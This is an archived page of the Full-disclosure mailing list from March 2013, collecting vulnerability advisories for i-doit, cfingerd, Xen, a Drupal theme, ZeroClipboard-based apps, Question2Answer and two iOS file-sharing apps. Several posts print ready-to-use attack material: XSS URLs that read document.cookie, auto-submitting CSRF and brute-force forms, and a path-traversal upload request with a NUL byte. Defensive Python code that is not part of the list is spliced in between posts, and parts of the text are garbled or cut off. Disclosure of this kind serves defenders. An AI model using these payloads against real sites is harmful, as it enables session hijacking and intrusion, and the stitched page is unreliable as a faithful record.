[Full-disclosure] CVE-2013-1413

2013-03-01 Thread Stephan Rickauer
#
#
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
#
#
#
# CVE ID : CVE-2013-1413
# CSNC ID: CSNC-2013-003
# Product: i-doit
# Vendor:  synetics Gesellschaft für Systemintegration mbH
# Subject: Cross-site Scripting - XSS
# Risk:    High
# Effect:  Remotely exploitable
# Author:  Stephan Rickauer (stephan.ricka...@csnc.ch)
# Date:    March 1st 2013
#
#


Introduction:
-
Compass Security AG discovered multiple security flaws in the i-doit
CMDB web application.


Vulnerable:
---
- i-doit versions prior to 1.0 Pro and 0.9.9-7 Open
- i-doit versions after 1.0 Pro with the input filter disabled (the default)


Patches:

Version 1.0.2 Pro has received a new configure option to 'sanitize user
input' which defaults to off and has to be manually enabled.


Description:

The i-doit web application does not properly encode output of user data
in various places. Exploiting this vulnerability leads to so-called
cross-site scripting (XSS) and allows execution of JavaScript code in
the context of the user's session, e.g. to impersonate logged-in i-doit
CMDB users.


Milestones:
---
2013-01-20  Vulnerability discovered
2013-01-20  Vendor notified
2013-01-20  CVE requested at MITRE.org
2013-01-21  Vendor contact established, provided with technical details
2013-01-21  CVE-ID assigned by MITRE
2013-01-21  Acknowledgement of vulnerability by vendor and agreement on
            advisory release schedule
2013-01-28  More XSS vulnerabilities identified, vendor updated
2013-02-20  Release of patched vendor software
2013-03-01  Public release of advisory


References:
---
http://www.i-doit.org
http://www.i-doit.com
http://www.csnc.ch

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] list patch

2013-03-01 Thread John Cartwright
Changelog:
- Remove support for a feature deprecated three years ago.
- See http://www.grok.org.uk/full-disclosure/fdfaq.html#moderation

Cheers
- John



[Full-disclosure] [SECURITY] [DSA 2635-1] cfingerd security update

2013-03-01 Thread Salvatore Bonaccorso
Debian Security Advisory DSA-2635-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
March 1, 2013  http://www.debian.org/security/faq

Package: cfingerd
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: yes
CVE ID : CVE-2013-1049
Debian Bug : 700098

Malcolm Scott discovered a remote-exploitable buffer overflow in the
rfc1413 (ident) client of cfingerd, a configurable finger daemon. This
vulnerability was introduced in a previously applied patch to the
cfingerd package in 1.4.3-3.

For the stable distribution (squeeze), this problem has been fixed in
version 1.4.3-3+squeeze1.

For the testing distribution (wheezy), this problem has been fixed in
version 1.4.3-3.1.

For the unstable distribution (sid), this problem has been fixed in
version 1.4.3-3.1.

We recommend that you upgrade your cfingerd packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[Full-disclosure] [Security-news] SA-CONTRIB-2013-031 - Premium Responsive theme - Cross Site Scripting (XSS)

2013-03-01 Thread security-news
View online: http://drupal.org/node/1929508

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-031
  * Project: Premium Responsive [1] (third-party theme)
  * Version: 7.x
  * Date: 2013-February-27
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

 DESCRIPTION  
-

This third-party contributed theme changes Drupal's interface.

The theme doesn't properly sanitize user-entered content in the 3 slide
gallery on the homepage, leading to a Cross Site Scripting (XSS)
vulnerability.

This vulnerability is mitigated by the fact that an attacker would have to
have the 'administer themes' permission.


 CVE IDENTIFIER(S) ISSUED  


  * /A CVE identifier [3] will be requested, and added upon issuance, in
accordance with Drupal Security Team processes./

 VERSIONS AFFECTED  
---

  * Premium Responsive versions prior to 7.x-1.6

Drupal core is not affected. If you do not use the contributed Premium
Responsive [4] theme, there is nothing you need to do.

 SOLUTION  


Install the latest version:
  * Premium Responsive 7.x-1.6 [5]


Also see the Premium Responsive [6] project page.

 REPORTED BY  
-

  * Greg Knaddison [7] of the Drupal Security Team

 FIXED BY  


  * saran.quardz [8] the theme maintainer

 COORDINATED BY  
--

  * Greg Knaddison [9] of the Drupal Security Team
  * Ben Jeavons [10] of the Drupal Security Team

 CONTACT AND MORE INFORMATION  


The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing
secure code for Drupal [13], and securing your site [14].


[1] http://drupal.org/project/responsive
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/responsive
[5] http://drupal.org/node/1730752
[6] http://drupal.org/project/responsive
[7] http://drupal.org/user/36762
[8] http://drupal.org/user/1031208
[9] http://drupal.org/user/36762
[10] http://drupal.org/user/91990
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration

___
Security-news mailing list
security-n...@drupal.org
Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news



[Full-disclosure] [SECURITY] [DSA 2636-1] xen security update

2013-03-01 Thread Moritz Muehlenhoff
Debian Security Advisory DSA-2636-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
March 01, 2013 http://www.debian.org/security/faq

Package: xen
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-4544 CVE-2012-5511 CVE-2012-5634 CVE-2013-0153
Debian Bug : 

Multiple vulnerabilities have been discovered in the Xen hypervisor. The 
Common Vulnerabilities and Exposures project identifies the following 
problems:

CVE-2012-4544

Insufficient validation of kernel or ramdisk sizes in the Xen PV 
domain builder could result in denial of service.

CVE-2012-5511

Several HVM control operations performed insufficient validation of
input, which could result in denial of service through resource
exhaustion.

CVE-2012-5634

Incorrect interrupt handling when using VT-d hardware could result
in denial of service.

CVE-2013-0153

Insufficient restriction of interrupt access could result in denial
of service.


For the stable distribution (squeeze), these problems have been fixed in
version 4.0.1-5.7.

For the testing distribution (wheezy), these problems have been fixed in
version 4.1.4-2.

For the unstable distribution (sid), these problems have been fixed in
version 4.1.4-2.

We recommend that you upgrade your xen packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[Full-disclosure] XSS vulnerabilities in em-shorty, RepRapCalculator, Fulcrum, Django and aCMS

2013-03-01 Thread MustLive
Hello list!

I'm resending my letter from February 23, 2013 (since FD was not working
that day).

After my previous list of vulnerable software with ZeroClipboard.swf, here
is a list of software with ZeroClipboard10.swf. These are Cross-Site
Scripting vulnerabilities in em-shorty, RepRapCalculator, Fulcrum, Django
and aCMS.

Earlier I wrote about Cross-Site Scripting vulnerabilities in
ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote
that this is a very widespread flash file and that it is placed on tens of
thousands of web sites and used in hundreds of web applications. Among them
are em-shorty, RepRapCalculator, Fulcrum (CMS), Django and aCMS. And there are
many other vulnerable web applications with ZeroClipboard10.swf (some of
them also contain ZeroClipboard.swf).

-
Affected products:
-

The following web applications with ZeroClipboard are vulnerable:

em-shorty 0.5.0 and previous versions.

RepRapCalculator.

Fulcrum - all versions of this CMS.

Django - there are multiple web sites on the Django framework (particularly
Django 1.3.1 and Djangoplicity) with ZeroClipboard.

aCMS 1.0.

Both XSS vulnerabilities in ZeroClipboard are fixed in the latest version (by
the new developers), ZeroClipboard 1.1.7. All developers should update the
swf file in their software.

--
Details:
--

Cross-Site Scripting (WASC-08):

XSS via the id parameter and XSS via copying a payload into the clipboard (as
described in the first advisory).

em-shorty:

http://site/public/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight

RepRapCalculator:

http://site/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight

http://site/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight

Fulcrum:

http://site/admin/lib/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight

http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight

http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight

Django (different web applications on Django framework):

Django 1.3.1:

http://site/media/js/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight

http://site/media/js/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight

Djangoplicity:

http://site/static/djangoplicity/js/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight

http://site/static/js/ZeroClipboard10.swfZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight

aCMS:

http://site/assets/swf/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//widthheight

Besides ZeroClipboard, aCMS also contains Cumulus (tagcloud.swf),
vulnerabilities in which I disclosed (and part of them were fixed) back in
2009. You can read about it in the article XSS vulnerabilities in 34
millions flash files
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html)

http://site/assets/swf/tagcloud.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua




[Full-disclosure] BF, IAA and CSRF vulnerabilities in Question2Answer

2013-03-01 Thread MustLive
Hello list!

These are Brute Force, Insufficient Anti-automation and Cross-Site Request
Forgery vulnerabilities in Question2Answer. This is the first part of
vulnerabilities in this web application.

-
Affected products:
-

Vulnerable are all versions of Question2Answer (tested in version 1.5.3).

As the developer informed me, he is planning to add protection against CSRF
in version Q2A 1.6 (see Timeline). And in January he added this protection
to the latest dev-version of Q2A
(http://www.question2answer.org/question2answer-dev-latest.zip). So before
the official release of Q2A 1.6 people can use this dev-version.

--
Details:
--

Brute Force (WASC-11):

In the login form (http://site/login) there is no protection against Brute
Force attacks.

Exploit:

http://websecurity.com.ua/uploads/2013/Question2Answer%20BF.html

<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/login" method="post">
<input type="hidden" name="emailhandle" value="1">
<input type="hidden" name="password" value="1">
<input type="hidden" name="remember" value="1">
<input type="hidden" name="dologin" value="1">
</form>
</body>

Insufficient Anti-automation (WASC-21):

On the contact page (http://site/feedback) there is no protection against
automated requests.

Exploit:

http://websecurity.com.ua/uploads/2013/Question2Answer%20IAA.html

<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/feedback" method="post">
<input type="hidden" name="message" value="test">
<input type="hidden" name="name" value="test">
<input type="hidden" name="email" value="test">
<input type="hidden" name="dofeedback" value="1">
</form>
</body>

Cross-Site Request Forgery (WASC-09):

There is no protection against CSRF attacks in the login (http://site/login)
and logout (http://site/logout) functionality, nor on other pages (there is
no protection against CSRF in the system at all). In the next advisory I'll
show an example of CSRF which allows taking over the admin account.

The lack of a captcha in the login form (http://site/login) can be used for
different attacks - a CSRF attack to log into an account (remote login - to
conduct attacks on vulnerabilities inside the account), the above-mentioned
Brute Force, phishing and other automated attacks, which you can read about
in the article Attacks on unprotected login forms
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html).


Timeline:
 

2012.11.27 - announced at my site.
2012.11.30 - informed developer (about the first part of the holes).
2012.12.01 - informed developer (about the second part of the holes).
2012.12 - during December I spoke with the developer about these holes and
convinced him to fix the CSRF holes.
2013.01.17 - developer informed me about plans to add protection against CSRF
in Q2A 1.6 (it'll be released in 2013) and that he added it to the latest
dev-version of Q2A.
2013.02.28 - disclosed at my site (http://websecurity.com.ua/6185/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 




[Full-disclosure] USB Disk & File Transfer v1.3.1 - File Include & Arbitrary File Upload Vulnerability

2013-03-01 Thread Vulnerability Lab
Title:
==
USB Disk & File Transfer v1.3.1 - File Include & Arbitrary File Upload
Vulnerability


Date:
=
2013-02-20


References:
===
http://www.vulnerability-lab.com/get_content.php?id=881


VL-ID:
=
881


Common Vulnerability Scoring System:

5.3


Introduction:
=
USB Disk & File Transfer allows you to store, view and manage files on your
iPhone, iPad or iPod touch. You can connect from any computer over the Wi-Fi
network and transfer files. Access your Dropbox, Box, Google Drive or SkyDrive
account to upload and download files and more. Also, exchange files between
iPhone, iPhone or iPod touch, using wifi or bluetooth.

USB Disk & File Transfer features a document viewer, PDF reader, music player,
video player, image viewer, text editor and file manager, and supports ZIP and
RAR.

Supported files: AVI, FLV, DIVX, ZIP, RAR, Rx, PDF, MP3, M4P, AAC, WAV, M4A,
MPV, M4V, MP4, MOV, 3GP, DOC, DOCX, XLS, XLSX, PPSX, PPTX, PPS, PPT, RTF,
PAGES, NUMBERS, KEY, JPG, JPEG, PNG, GIF, BMP, PCX, TIFF, TIF, BMPF, ICO, CUR,
XBM, HTML, TXT, text files like: C, M, H,...

(Copy of the Homepage: 
https://itunes.apple.com/us/app/usb-disk-file-transfer/id516927225 )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a file include web
vulnerability in the mobile USB Disk & File Transfer v1.3.1 app for the Apple
iPad & iPhone.


Report-Timeline:

2013-02-20: Public Disclosure


Status:

Published


Affected Products:
==
Apple
Product: USB Disk  File Transfer 1.3.1


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A local file include web vulnerability via the POST request method is detected
in the mobile USB Disk & File Transfer v1.3.1 app for the Apple iPad & iPhone.
The vulnerability allows remote attackers, via the POST method, to inject local
app webserver folders to request unauthorized local webserver files.

The vulnerability is located in the upload file module of the webserver
(http://192.168.0.102:8080) when processing a manipulated name or path loaded
via POST. The execution of the injected path or name of the file request
occurs when the attacker views the file dir listing on the main index site.

Exploitation of the vulnerability requires no user interaction and can be done
without a privileged application user account (no password standard).
Successful exploitation of the vulnerability results in unauthorized path or
file access via a local file or path include attack.

Vulnerable Application(s):
[+] USB Disk & File Transfer v1.3.1 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] File Upload  (Web Server) [Remote]

Vulnerable Parameter(s):
[+] name
[+] path

Affected Module(s):
[+] File Dir Index Listing


Proof of Concept:
=
The local file include web vulnerability can be exploited by remote attackers
without a privileged application user account and also without required user
interaction. For demonstration or to reproduce ...

PoC:
http://192.168.0.102:8080/files/?_=[FILE OR PATH INCLUDE VULNERABILITY!]


Review: Index Listing - Name & Path

{"currentDir":"","files":[{"name":"[FILE INCLUDE VULNERABILITY!].png","tam":"27.3 KB","date":"18.02.13 23:18","type":"FILE","path":"[PATH INCLUDE VULNERABILITY!].png","id":0},
{"name":"8765434.png","tam":"228.5 KB","date":"18.02.13 23:23","type":"FILE","path":"8765434.png","id":1}]}


Manual steps to reproduce ...
1. Start the application or scan for an available application
2. Visit the web interface by opening the following network IP
   192.168.0.102:8080 in your browser
3. Start your session tamper to manipulate the next POST request
4. Choose a file to upload and activate the tamper
5. Replace the path or name values with your own local app path or local file
   to request after sending
6. Send the data to the webserver via POST and watch the index listing to
   provoke the execution out of the file dir listing (name & path)
7. Successfully reproduced!


Reference(s):
http://192.168.0.102:8080/


Risk:
=
The security risk of the local file/path include web vulnerability via POST 
request method is estimated as high(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the 

[Full-disclosure] IPMap v2.5 iPad iPhone - File Upload Web Vulnerabilities

2013-03-01 Thread Vulnerability Lab
Title:
==
IPMap v2.5 iPad iPhone - File Upload Web Vulnerabilities


Date:
=
2013-02-18


References:
===
http://www.vulnerability-lab.com/get_content.php?id=866


VL-ID:
=
866


Common Vulnerability Scoring System:

6.3


Introduction:
=
IPMap - IP Address Lookup Details & HTTP Wireless File Sharing with latest
WorldWide IP database & FREE Monthly update.
Accuracy: Over 99.8% on a country level and 83% on a city level for the US
within a 25 mile radius.

Features:
Auto Detect & Lookup
Your Real IP address
IP address Hostname
IP address Country Code
IP address Country Name
IP address Region
IP address Region Name
IP address City
IP address Postal Code
IP address Latitude
IP address Longitude
IP address Metro Code
IP address Area Code
IP location Map
HTTP Wireless File Sharing
iTunes File Sync
Web Upload File Support
Customizable Background from your Photos Album

(Copy of the Homepage: 
https://itunes.apple.com/us/app/ipmap-ip-address-lookup-details/id416041538 )


Abstract:
=
The Vulnerability Laboratory Research Team discovered an arbitrary file upload
vulnerability in the mobile IPMap v2.5 app for the Apple iPad & iPhone.


Report-Timeline:

2013-02-18: Public Disclosure


Status:

Published


Affected Products:
==
Apple AppStore
Product: IPMap - iPad iPhone 2.5


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

A local file include and arbitrary file upload web vulnerability via the POST
request method is detected in the mobile IPMap v2.5 app for the Apple iPad &
iPhone. The vulnerability allows remote attackers, via the POST method, to
inject local app webserver folders to request unauthorized local webserver
files.

1.1
The main vulnerability is located in the upload file script of the webserver
(http://192.168.0.10:6123/) when processing a manipulated filename loaded via
the POST request method. The execution of the injected path or file request
occurs when the attacker views the file index listing of the wifi web
application web-server.

1.2
Remote attackers can also implement mobile webshells without authorization by
using multiple file extensions (pentest.php.js.gif) when uploading (submitting)
via the POST request method. The attacker uploads a file with a double or
multiple extension and accesses the file in the second step via the webserver
dir listing to compromise the Apple iPhone or iPad.

Exploitation of the local file include web vulnerability does not require user
interaction and also no privileged user account.
Successful exploitation of the web vulnerabilities results in app/service
manipulation and iPad or iPhone compromise via file include or unauthorized
file (webshell) upload attacks.


Vulnerable Application(s):
[+] WiFilet v1.2 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] File Upload via Submit (Web Server) [Remote]

Vulnerable Parameter(s):
[+] file & filename

Affected Module(s):
[+] File Dir Index - Listing


Proof of Concept:
=
Both vulnerabilities can be exploited by remote attackers without privileged 
application user account and also without required user interaction.
For demonstration or reproduce ...

1.1
PoC: (POST)
-307341202725627
Content-Disposition: form-data; name="file";
filename="../../../../cmdhometmp%00'.png"
Content-Type: image/png
ÿØÿà


Review: File Dir Listing

htmlhead
meta http-equiv=content-type content=text/html; 
charset=ISO-8859-1titleIPMap/title
stylebody { background-color:#f0f7fd; 
font-family:Tahoma,Arial,Helvetica,sans-serif; 
font-size:18x; padding:15px; margin-left:15%; margin-right:15%; } 
/style/headbody
h2 style=background-color:#6897ff; margin:0; color:#fff; padding:5px 10px; 
border: 1px outset #aaa;border-bottom: 0px;IPMap/h2
h4 style=background-color:#6897ff;margin:0; color:#fff; padding:0px 10px 8px 
10px; border: 1px outset #aaa; border-top: 0px;
The following files are hosted live from the iPhone's Docs 
folder./h4ptable style=text-align:center; border-color:#9bc0d2; 
background:#f0f7fd; color:#4e697a;  margin:0 auto; border=1 cellpadding=0 
cellspacing=0tbodytr height=30td width=400
strongFile Name/strong/tdtd width=400strongFile 
Info/strong/td/trtr height=30
tda 
href=http://192.168.0.10:6123/../../../../cmdhometmp%00'%20%20%20%20iframe
 src=../../../../cmdhometmp%00'%20%20%20%20
%20%20%20%20/a/tdtd(27.3 Kb, 2013-02-07 07:00:31 
+)/td/tr/table/pform action= 
method=post enctype=multipart/form-data name=form1 
id=form1table border=0 cellpadding=0 cellspacing=0 
style=text-align:center; margin:0 auto;tr 
height=50td width=400labelupload fileinput 
type=file name=file id=file //label/tdtd 
width=400labelinput type=submit name=button 
id=button value=Submit / 
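Both Vulnerability Lab advisories above turn on a browser-supplied filename (a traversal path with an embedded NUL, a multi-extension name such as pentest.php.js.gif) that the app then echoes in its file index listing. As an added defender-side example, not code from either advisory or from the apps' vendors, here is how an upload handler can reject those names and escape what it does display; the Content-Disposition lines are constructed samples and the extension allowlist is an assumption.

```python
import html
import re
import secrets
from typing import Tuple

# Constructed sample header lines a server would see for the upload attempts
# described in the advisories (not captured traffic), plus one benign name.
SAMPLE_DISPOSITIONS = [
    'form-data; name="file"; filename="../../../../cmdhometmp%00\'.png"',
    'form-data; name="file"; filename="pentest.php.js.gif"',
    'form-data; name="file"; filename="holiday photo.png"',
]

ALLOWED_EXT = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}   # assumed allowlist
STEM_RE = re.compile(r"^[A-Za-z0-9 _-]{1,64}$")
FILENAME_RE = re.compile(r'filename="([^"]*)"')


class UploadRejected(ValueError):
    pass


def filename_from_disposition(header: str) -> str:
    m = FILENAME_RE.search(header)
    if not m:
        raise UploadRejected("no filename in Content-Disposition")
    return m.group(1)


def validate_upload_name(raw: str) -> Tuple[str, str]:
    """Return (stem, ext) or raise UploadRejected.

    Deny by default: nothing the browser sent may steer where the file lands
    or how a web server later interprets it.
    """
    if "\x00" in raw or "%00" in raw.lower():
        raise UploadRejected("NUL byte in filename")
    if "/" in raw or "\\" in raw or ".." in raw:
        raise UploadRejected("path separator or traversal in filename")
    parts = raw.split(".")
    if len(parts) != 2:   # rejects "pentest.php.js.gif" and names with no extension
        raise UploadRejected("exactly one extension required")
    stem, ext = parts[0], parts[1].lower()
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not STEM_RE.fullmatch(stem):
        raise UploadRejected("stem contains characters outside the allowlist")
    return stem, ext


def store_name(raw: str) -> Tuple[str, str]:
    """Return (display_name, on_disk_name) for an accepted upload.

    The on-disk name is generated server-side, so even a validated client name
    never becomes a path component; the display name is what the index shows.
    """
    stem, ext = validate_upload_name(raw)
    return f"{stem}.{ext}", f"{secrets.token_hex(8)}.{ext}"


def listing_row(display_name: str, size_kb: float) -> str:
    """One row of the file index; escaping keeps a stored name from becoming markup."""
    return f"<tr><td>{html.escape(display_name)}</td><td>{size_kb:.1f} KB</td></tr>"


def process_disposition(header: str) -> Tuple[str, str]:
    """Outcome for one multipart part: ('stored', display_name) or ('rejected', reason)."""
    try:
        display, _disk = store_name(filename_from_disposition(header))
    except UploadRejected as exc:
        return ("rejected", str(exc))
    return ("stored", display)


if __name__ == "__main__":
    for line in SAMPLE_DISPOSITIONS:
        print(process_disposition(line))
```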

[Full-disclosure] Paypal Bug Bounty #5 - Persistent Web Vulnerability

2013-03-01 Thread Vulnerability Lab
Title:
==
Paypal Bug Bounty #5 - Persistent Web Vulnerability


Date:
=
2013-03-02


References:
===
http://www.vulnerability-lab.com/get_content.php?id=639


VL-ID:
=
639


Common Vulnerability Scoring System:

3.3


Introduction:
=
PayPal is a global e-commerce business allowing payments and money transfers
to be made through the Internet. Online money transfers serve as electronic
alternatives to paying with traditional paper methods, such as checks and
money orders. Originally, a PayPal account could be funded with an electronic
debit from a bank account or by a credit card at the payer's choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account
after the account holder exceeded a predetermined spending limit. After that
point, PayPal will attempt to take funds for a purchase from funding sources
according to a specified funding hierarchy. If you set one of the funding
sources as Primary, it will default to that, within that level of the
hierarchy (for example, if your credit card ending in 4567 is set as the
Primary over 1234, it will still attempt to pay money out of your PayPal
balance, before it attempts to charge your credit card). The funding
hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal
Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if
selected as primary funding source) (It can bypass the Balance); a verified
bank account; other funding sources, such as non-PayPal credit cards. The
recipient of a PayPal transfer can either request a check from PayPal,
establish their own PayPal deposit account or request a transfer to their
bank account.

PayPal is an acquirer, performing payment processing for online vendors,
auction sites, and other commercial users, for which it charges a fee. It may
also charge a fee for receiving money, proportional to the amount received.
The fees depend on the currency used, the payment option used, the country of
the sender, the country of the recipient, the amount sent and the recipient's
account type. In addition, eBay purchases made by credit card through PayPal
may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its
corporate headquarters are in San Jose, California, United States at eBay's
North First Street satellite office campus. The company also has significant
operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the
United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of
July 2007, across Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP),
China's bankcard association, to allow Chinese consumers to use PayPal to shop
online. PayPal is planning to expand its workforce in Asia to 2,000 by the end
of the year 2010. Between December 4–9, 2010, PayPal services were attacked in
a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal's decision to freeze the account of WikiLeaks citing terms of use
violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract:
=
The Vulnerability Laboratory Research Team discovered a Web Vulnerability in 
the official Paypal Plaze ecommerce website application.


Report-Timeline:

2012-06-30: Researcher Notification  Coordination
2012-06-30: Vendor Notification
2012-07-02: Vendor Response/Feedback
2013-01-15: Vendor Fix/Patch
2013-02-03: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

A persistent input validation vulnerability is detected in the official Paypal
ecommerce website content management system.
The bugs allow remote attackers to implement/inject malicious script code on
the application side (persistent).

The persistent vulnerability is located in the Gift & eCard module with the
bound vulnerable title or message parameters.
Exploitation requires low user interaction or a privileged application user
account for local exploitation.
Successful exploitation of the vulnerability can lead to session hijacking
(admin), account stealing via persistent web attack
or stable (persistent) context manipulation.

Vulnerable Module(s):
  [+] Send an eCard & eCard/GiftCard Listing


Vulnerable Parameter(s):
  [+] Greeting Title
  [+] Greeting Message


Proof of Concept:
=
The persistent vulnerability can be exploited by remote attackers & local
privileged user accounts with low required user interaction.
For demonstration or to reproduce ...

Review: Greeting Message - 

[Full-disclosure] Proofpoint Protection Server Session Persistence

2013-03-01 Thread BugsNotHugs

Proofpoint Protection Server Session Persistence

A vulnerability exists in Proofpoint Protection Server (ver 4.0.7.67)
where a session to the web admin interface is not terminated after the
device reboots. Sessions should be terminated upon logout, and especially if
the device reboots.

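As an added example, not Proofpoint code and making no claim about how the appliance actually stores sessions, here is one way to make admin sessions die with a reboot: each session records the boot id under which it was created, validation rejects any session from an earlier boot, and logout destroys the record server-side. The dict stands in for whatever persistent store survives the restart; the ids and the 30-minute TTL are assumptions.

```python
import secrets
from typing import Dict, Optional


class AdminSessionStore:
    """Admin-console sessions bound to a boot generation.

    A restart produces a fresh boot id, so a session that survived on disk
    fails the generation check afterwards even though its row still exists.
    """

    def __init__(self, ttl_seconds: int = 1800) -> None:
        self.ttl = ttl_seconds
        self.boot_id = secrets.token_hex(16)        # regenerated on every boot
        # Simulates a persistent store that outlives a reboot (the situation the
        # advisory describes); nothing here is cleared by reboot() on purpose.
        self.persisted: Dict[str, dict] = {}

    def reboot(self) -> None:
        """Simulate the appliance restarting: new boot id, rows untouched."""
        self.boot_id = secrets.token_hex(16)

    def login(self, user: str, now: float) -> str:
        sid = secrets.token_urlsafe(32)
        self.persisted[sid] = {
            "user": user,
            "boot_id": self.boot_id,            # generation the session belongs to
            "expires": now + self.ttl,
        }
        return sid

    def logout(self, sid: str) -> None:
        """Destroy the session server-side rather than relying on the cookie going away."""
        self.persisted.pop(sid, None)

    def authenticate(self, sid: str, now: float) -> Optional[str]:
        """Return the user for a valid session id, or None when it must be rejected."""
        row = self.persisted.get(sid)
        if row is None:
            return None
        if row["boot_id"] != self.boot_id:
            self.persisted.pop(sid, None)       # pre-reboot session: purge, never honour
            return None
        if now >= row["expires"]:
            self.persisted.pop(sid, None)
            return None
        return row["user"]

    def purge_stale(self) -> int:
        """Boot-time housekeeping: drop every session from an earlier generation."""
        stale = [sid for sid, row in self.persisted.items() if row["boot_id"] != self.boot_id]
        for sid in stale:
            del self.persisted[sid]
        return len(stale)
```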